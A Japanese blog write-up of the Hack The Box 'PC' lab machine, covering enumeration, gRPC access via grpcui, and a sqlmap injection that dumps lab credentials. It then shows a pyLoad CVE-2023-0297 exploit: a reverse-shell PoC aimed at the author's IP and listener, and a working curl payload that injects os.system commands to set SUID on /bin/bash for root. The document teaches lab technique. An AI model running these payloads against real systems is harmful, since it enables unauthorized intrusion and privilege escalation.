🐱
[Hack The Box] PC writeup
レベルはeasyだけど見慣れぬportだったがgrpcUIなど初めて使うツールがあり、勉強になった
HTB初心者にはOSINT含め、おすすめのマシン
openvpn
┌──(kali㉿kali)-[~]
└─$ sudo openvpn /home/kali/Downloads/lab_ryotaromosao.ovpn
[sudo] kali のパスワード:
2023-12-07 18:54:52 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2023-12-07 18:54:52 Note: --data-cipher-fallback with cipher 'AES-128-CBC' disables data channel offload.
2023-12-07 18:54:52 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2023-12-07 18:54:52 library versions: OpenSSL 3.0.9 30 May 2023, LZO 2.10
USER PRIVILEGES
nmap
-
ポートスキャンはいつも大体このオプション
-
スキャンのスピード上げるために
-T4と--min-rate 10000を利用┌──(kali㉿kali)-[~] └─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.214 -sSV -Pn [sudo] kali のパスワード: Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 19:03 JST NSE: Loaded 46 scripts for scanning. Initiating SYN Stealth Scan at 19:03 Scanning 10.10.11.214 [1000 ports] Discovered open port 22/tcp on 10.10.11.214 Completed SYN Stealth Scan at 19:03, 2.34s elapsed (1000 total ports) Initiating Service scan at 19:03 Scanning 1 service on 10.10.11.214 Completed Service scan at 19:03, 0.52s elapsed (1 service on 1 host) NSE: Script scanning 10.10.11.214. Initiating NSE at 19:03 Completed NSE at 19:03, 0.00s elapsed Initiating NSE at 19:03 Completed NSE at 19:03, 0.00s elapsed Nmap scan report for 10.10.11.214 Host is up (0.25s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel -
通常HTBでport22しか開いてないことはない…一旦全ポートスキャンをしてみる
-
全ポートスキャンは
-p-でできる┌──(kali㉿kali)-[~] └─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.214 -sSV -Pn -p- Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower. Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-07 19:10 JST NSE: Loaded 46 scripts for scanning. Initiating SYN Stealth Scan at 19:10 Scanning 10.10.11.214 [65535 ports] Discovered open port 22/tcp on 10.10.11.214 Discovered open port 50051/tcp on 10.10.11.214 Completed SYN Stealth Scan at 19:10, 14.58s elapsed (65535 total ports) Initiating Service scan at 19:10 Scanning 2 services on 10.10.11.214 Completed Service scan at 19:10, 20.51s elapsed (2 services on 1 host) NSE: Script scanning 10.10.11.214. Initiating NSE at 19:10 Completed NSE at 19:10, 0.01s elapsed Initiating NSE at 19:10 Completed NSE at 19:10, 0.52s elapsed Nmap scan report for 10.10.11.214 Host is up (0.30s latency). Not shown: 65533 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) 50051/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port50051-TCP:V=7.94%I=7%D=12/7%Time=65719A16%P=x86_64-pc-linux-gnu%r(N SF:ULL,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\x0 SF:6\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(Generic SF:Lines,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(GetRe SF:quest,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(HTTPO SF:ptions,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0 SF:\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RTSP SF:Request,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\ SF:0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(RPC SF:Check,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\xff\xff\0\ SF:x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0")%r(DNSVe SF:rsionBindReqTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0\?\ SF:xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\0\0 SF:")%r(DNSStatusRequestTCP,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0 SF:\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\ SF:0\0\?\0\0")%r(Help,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x05\0 SF:\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0\?\ SF:0\0")%r(SSLSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff\xff\0\x0 SF:5\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\0\0\0\0\0 SF:\?\0\0")%r(TerminalServerCookie,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xf SF:f\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0 SF:\0\0\0\0\0\?\0\0")%r(TLSSessionReq,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\? SF:\xff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x0 SF:8\0\0\0\0\0\0\?\0\0")%r(Kerberos,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\ SF:0\0\0\0\0\0\?\0\0")%r(SMBProgNeg,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\x SF:ff\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\ SF:0\0\0\0\0\0\?\0\0")%r(X11Probe,2E,"\0\0\x18\x04\0\0\0\0\0\0\x04\0\?\xff SF:\xff\0\x05\0\?\xff\xff\0\x06\0\0\x20\0\xfe\x03\0\0\0\x01\0\0\x04\x08\0\ SF:0\0\0\0\0\?\0\0"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel -
port50051って何!?怪しいから調べてみる
-
いつもだいたいport80が開いてるから、webサイト調べてる間に
ffufを使ってディレクトリ探索とサブドメイン調べるけど、今回はやらなった -
参照元[https://zenn.dev/k88t76/books/f3892660871ab2/viewer/254bd9]
gRPCサーバーを起動するserver.goの実装をしていきます。
今回gRPCサーバーはgRPCのデフォルトポートである50051に立てることにします。
GRPCとは
In gRPC, a client application can directly call a method on a server application on a different machine as if it were a local object, making it easier for you to create distributed applications and services. As in many RPC systems, gRPC is based around the idea of defining a service, specifying the methods that can be called remotely with their parameters and return types. On the server side, the server implements this interface and runs a gRPC server to handle client calls. On the client side, the client has a stub (referred to as just a client in some languages) that provides the same methods as the server.
-
gRPCとはGoogleが開発したプロトコルで、主にマイクロサービス間(サーバー間)での通信に用いられるRPC(Remote procedure call:遠隔手続き呼び出し)という技術がベースとなっているらしい。
-
いろいろ調べてみるとgrpcUIというgRPCサーバーにアクセスできるツールを見つけた
go install github.com/fullstorydev/grpcui/cmd/grpcui@latest
- GOで環境変数をHOMEディレクトリ内のGOPATHに設定する
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
┌──(kali㉿kali)-[/home/kali.org/Machine/PC]
└─$ grpcui -plaintext 10.10.11.214:50051
gRPC Web UI available at http://127.0.0.1:41631/
libva error: vaGetDriverNameByIndex() failed with unknown libva error, driver_name = (null)
[20537:20537:1209/001846.801029:ERROR:policy_logger.cc(157)] :components/enterprise/browser/controller/chrome_browser_cloud_management_controller.cc(163) Cloud management controller initialization aborted as CBCM is not enabled.
tracing_subscriber - init success
登録画面、ログイン画面、Getinfo画面があった
ます登録してみる
ログインしてみると、tokenとID情報が得られた
おそらくtokenとIDに紐づかれた情報をGetinfoで得ることができるのだろう
- ここで一旦burpsuiteを見てみる
- 色々試してみたが有力な情報は得られず…考えられるのはSQLインジェクションくらいだと思い
sqlmapを使ってみる - リクエストは
copy to fileで保存する
sqlmap
ここでいつも使ってるテクニックだが、コマンドの細かいオプションは-hで調べてもいいがcurl cheat.sh/***は結構おすすめである(stone beat security主催のHTB勉強会で佐々木さんに教えてもらった)
┌──(kali㉿kali)-[/home/kali.org]
└─$ curl cheat.sh/sqlmap
cheat:sqlmap
---
tags: [ database ]
---
# Test URL and POST data and return database banner (if possible)
./sqlmap.py --url="<url>" --data="<post-data>" --banner
# Parse request data and test | request data can be obtained with burp
./sqlmap.py -r <request-file> <options>
# Fingerprint | much more information than banner
./sqlmap.py -r <request-file> --fingerprint
# Get database username, name, and hostname
./sqlmap.py -r <request-file> --current-user --current-db --hostname
# Check if user is a database admin
./sqlmap.py -r <request-file> --is-dba
# Get database users and password hashes
./sqlmap.py -r <request-file> --users --passwords
# Enumerate databases
./sqlmap.py -r <request-file> --dbs
# List tables for one database
./sqlmap.py -r <request-file> -D <db-name> --tables
# Other database commands
./sqlmap.py -r <request-file> -D <db-name> --columns
--schema
--count
# Enumeration flags
./sqlmap.py -r <request-file> -D <db-name>
-T <tbl-name>
-C <col-name>
-U <user-name>
# Extract data
./sqlmap.py -r <request-file> -D <db-name> -T <tbl-name> -C <col-name> --dump
# Execute SQL Query
./sqlmap.py -r <request-file> --sql-query="<sql-query>"
# Append/Prepend SQL Queries
./sqlmap.py -r <request-file> --prefix="<sql-query>" --suffix="<sql-query>"
# Get backdoor access to sql server | can give shell access
./sqlmap.py -r <request-file> --os-shell
tldr:sqlmap
# sqlmap
# Detect and exploit SQL injection flaws.
# More information: <https://sqlmap.org>.
# Run sqlmap against a single target URL:
python sqlmap.py -u "http://www.target.com/vuln.php?id=1"
# Send data in a POST request (`--data` implies POST request):
python sqlmap.py -u "http://www.target.com/vuln.php" --data="id=1"
# Change the parameter delimiter (& is the default):
python sqlmap.py -u "http://www.target.com/vuln.php" --data="query=foobar;id=1" --param-del=";"
# Select a random `User-Agent` from `./txt/user-agents.txt` and use it:
python sqlmap.py -u "http://www.target.com/vuln.php" --random-agent
# Provide user credentials for HTTP protocol authentication:
python sqlmap.py -u "http://www.target.com/vuln.php" --auth-type Basic --auth-cred "testuser:testpass"
実際に打ったコマンドはこれである
┌──(kali㉿kali)-[~/Documents]
└─$ sqlmap -r pc-1.req --dump
___
__H__
___ ___[.]_____ ___ ___ {1.7.11#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 00:50:02 /2023-12-09/
[00:50:02] [INFO] parsing HTTP request from 'pc-1.req'
JSON data found in POST body. Do you want to process it? [Y/n/q] Y
Cookie parameter '_grpcui_csrf_token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] N
[00:50:05] [INFO] resuming back-end DBMS 'sqlite'
[00:50:05] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: JSON id ((custom) POST)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: {"metadata":[{"name":"token","value":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoidGVzdCIsImV4cCI6MTcwMjAxNjc3OX0.xksCZGKuWgviU3LIK2NEez0MBPe5Y9m5fb6BSXy0EaY"}],"data":[{"id":"111 UNION ALL SELECT CHAR(113,122,106,118,113)||CHAR(117,86,79,116,77,84,104,81,116,71,115,114,65,89,109,105,81,66,114,122,68,72,116,80,84,72,81,69,85,81,109,76,117,100,67,110,79,117,84,109)||CHAR(113,122,112,107,113)-- wPsd"}]}
---
[00:50:06] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[00:50:06] [INFO] fetching tables for database: 'SQLite_masterdb'
[00:50:06] [INFO] fetching columns for table 'accounts'
[00:50:06] [INFO] fetching entries for table 'accounts'
Database: <current>
Table: accounts
[2 entries]
+------------------------+----------+
| password | username |
+------------------------+----------+
| admin | admin |
| HereIsYourPassWord1431 | sau |
+------------------------+----------+
[00:50:06] [INFO] table 'SQLite_masterdb.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/SQLite_masterdb/accounts.csv'
[00:50:06] [INFO] fetching columns for table 'messages'
[00:50:06] [INFO] fetching entries for table 'messages'
Database: <current>
Table: messages
[1 entry]
+----+----------------------------------------------+----------+
| id | message | username |
+----+----------------------------------------------+----------+
| 1 | The admin is working hard to fix the issues. | admin |
+----+----------------------------------------------+----------+
[00:50:06] [INFO] table 'SQLite_masterdb.messages' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/SQLite_masterdb/messages.csv'
[00:50:06] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'
[*] ending @ 00:50:06 /2023-12-09/
userとpasswordゲット!ssh接続する
ssh
┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh sau@10.10.11.214
sau@10.10.11.214's password:
Last login: Fri Dec 8 15:53:02 2023 from 10.10.14.13
sau@pc:~$ ls
user.txt
user.txtが取れました!
PRIVILEGE ESCALATION
sudo -l
まずはuser(sau)がroot権限で実行できるファイルがないかを確認してみる
sau@pc:~$ sudo -l
[sudo] password for sau:
Sorry, user sau may not run sudo on localhost.
なさそう…
Linpeas
LinpeasとはLinuxの権限昇格に繋がりそうな不備や情報を自動で収集してくれるツールである。ぺネトレをする人で知らない人はいないだろう。
ただ、出力される情報が多いので、うまく利用するためには場数を踏まないといけない(なお自分は全然自信ない)
Linux local Privilege Escalation Awesome Script (linPEAS) is a script that search for possible paths to escalate privileges on Linux/Unix hosts.
するとActive Portsの欄を見つけた
50051以外にも色々portが開いているらしい、アクセスしてみる
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:8000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9666 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::50051 :::* LISTEN - ```
curl cheat.sh/sshでsshの使い方を調べる
ssh -L
┌──(kali㉿kali)-[/home/kali.org]
└─$ curl cheat.sh/ssh
cheat.sheets:ssh
# ssh
# OpenSSH SSH client (remote login program)
# SSH tunneling: Forward a specific port (`localhost:9999` to `example.org:80`) along with disabling pseudo-[T]ty allocation and executio[N] of remote commands:
ssh -L 9999:example.org:80 -N -T username@remote_host
┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh -L 1234:localhost:8000 sau@10.10.11.214
sau@10.10.11.214's password:
Last login: Fri Dec 8 15:54:19 2023 from 10.10.14.13
sau@pc:~$
上記のコマンドで10.10.11.214:8000(ターゲットマシン)をlocalhost:1234に転送することができた
pyLoad
pyLoadについて調べてみる、pyLoadとは
pyLoad was developed to run on NAS, next-gen routers and headless home servers, whatever device able to connect to internet and supporting the Python programming language, so it's available for all kind of operating systems and a wide range of hardware platforms; you can even install on your PC or Mac if you want and control it entirely by web in the same way.
らしい
pyLoadのexploitについてpyLoad PoC githubなどで調べてみるとこの記事があった。
RCEの脆弱性らしく、CVEが発行されたのは2023年なのでめちゃくちゃ怪しい(というかほぼ確定でしょう)
pyLoad Pre-auth RCE(CVE-2023-029)
このexploit.pyを自身のマシン側で試してみる
┌──(kali㉿kali)-[/home/kali.org/Machine/PC/CVE-2023-0297]
└─$ python3 exploit.py -t localhost:1234 -I 10.10.14.13 -P 4444
[SUCCESS] Running reverse shell. Check your listener!
^CTraceback (most recent call last):
File "/home/kali.org/Machine/PC/CVE-2023-0297/exploit.py", line 105, in <module>
main()
File "/home/kali.org/Machine/PC/CVE-2023-0297/exploit.py", line 90, in main
exploit.execute_command(reverse_shell)
File "/home/kali.org/Machine/PC/CVE-2023-0297/exploit.py", line 52, in execute_command
response = requests.post(url, data=data, proxies=self.proxies)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/api.py", line 115, in post
return request("post", url, data=data, json=json, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/api.py", line 59, in request
return session.request(method=method, url=url, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 587, in request
resp = self.send(prep, **send_kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 701, in send
r = adapter.send(request, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 489, in send
resp = conn.urlopen(
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 704, in urlopen
httplib_response = self._make_request(
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 450, in _make_request
six.raise_from(e, None)
File "<string>", line 3, in raise_from
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 445, in _make_request
httplib_response = conn.getresponse()
^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/http/client.py", line 1378, in getresponse
response.begin()
File "/usr/lib/python3.11/http/client.py", line 318, in begin
version, status, reason = self._read_status()
^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/http/client.py", line 279, in _read_status
line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/socket.py", line 706, in readinto
return self._sock.recv_into(b)
^^^^^^^^^^^^^^^^^^^^^^^
KeyboardInterrupt
┌──(kali㉿kali)-[/home/kali.org/Machine/PC]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
うーん、うまくリバースシェルが返ってこない
次にターゲットマシン側で発火させてみる
sau@pc:/tmp$ python3 exploit.py -t localhost:8000 -I 10.10.14.13 -P 4444
Traceback (most recent call last):
File "exploit.py", line 10, in <module>
import requests
File "/usr/lib/python3/dist-packages/requests/__init__.py", line 95, in <module>
from urllib3.contrib import pyopenssl
File "/usr/lib/python3/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1553, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1573, in X509StoreFlags
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
Error in sys.excepthook:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/apport_python_hook.py", line 72, in apport_excepthook
from apport.fileutils import likely_packaged, get_recent_crashes
File "/usr/lib/python3/dist-packages/apport/__init__.py", line 5, in <module>
from apport.report import Report
File "/usr/lib/python3/dist-packages/apport/report.py", line 32, in <module>
import apport.fileutils
File "/usr/lib/python3/dist-packages/apport/fileutils.py", line 12, in <module>
import os, glob, subprocess, os.path, time, pwd, sys, requests_unixsocket
File "/usr/lib/python3/dist-packages/requests_unixsocket/__init__.py", line 1, in <module>
import requests
File "/usr/lib/python3/dist-packages/requests/__init__.py", line 95, in <module>
from urllib3.contrib import pyopenssl
File "/usr/lib/python3/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1553, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1573, in X509StoreFlags
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
Original exception was:
Traceback (most recent call last):
File "exploit.py", line 10, in <module>
import requests
File "/usr/lib/python3/dist-packages/requests/__init__.py", line 95, in <module>
from urllib3.contrib import pyopenssl
File "/usr/lib/python3/dist-packages/urllib3/contrib/pyopenssl.py", line 46, in <module>
import OpenSSL.SSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1553, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1573, in X509StoreFlags
CB_ISSUER_CHECK = _lib.X509_V_FLAG_CB_ISSUER_CHECK
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_CB_ISSUER_CHECK'
┌──(kali㉿kali)-[/home/kali.org/Machine/PC]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
やっぱ上手くいかない。HTBでこういうことはよくあることなので気を取り直してこの記事でやってみる。
sau@pc:/tmp$ curl -i -s -k -X $'POST' \
> -H $'Host: 127.0.0.1:8000' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
> --data-binary $'package=xxx&crypted=AAAA&jk=%70%79%69%6d%70%6f%72%74%20%6f%73%3b%6f%73%2e%73%79%73%74%65%6d%28%22%74%6f%75%63%68%20%2f%74%6d%70%2f%70%77%6e%64%22%29;f=function%20f2(){};&passwords=aaaa' \
> $'http://127.0.0.1:8000/flash/addcrypted2'
HTTP/1.1 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 21
Access-Control-Max-Age: 1800
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: OPTIONS, GET, POST
Vary: Accept-Encoding
Date: Fri, 08 Dec 2023 06:06:39 GMT
Server: Cheroot/8.6.0
この記事によると、発火させられたらtouch /tmp/pwndのファイルが出来るらしいので確認してみる。
/tmp$ ls
exploit.py
pwnd
pyLoad
snap-private-tmp
systemd-private-6b2ead31914b4c5c916dded28dfc3521-ModemManager.service-dsoEBg
systemd-private-6b2ead31914b4c5c916dded28dfc3521-systemd-logind.service-GJEqDi
systemd-private-6b2ead31914b4c5c916dded28dfc3521-systemd-resolved.service-u62Akh
tmpj9fasysz
tmux-1001
vmware-root_737-4257003961
あった!!(歓喜の舞)
現在jk=以下がtouch /tmp/pwndのURLエンコードになっているので、chmod +s /bin/bashをURLエンコードする。(ツールはみんな大好きCyberChef)
よって最終的なpayloadは
curl -i -s -k -X $'POST' \
-H $'Host: 127.0.0.1:8000' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 184' \
--data-binary $'package=xxx&crypted=AAAA&jk=chmod%20%2Bs%20%2Fbin%2Fbash;f=function%20f2(){};&passwords=aaaa' \
$'http://127.0.0.1:8000/flash/addcrypted2'
sau@pc:/tmp$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
sau@pc:/tmp$ bash -p
bash-5.0# whoami
root
root.txtが取れました!
Discussion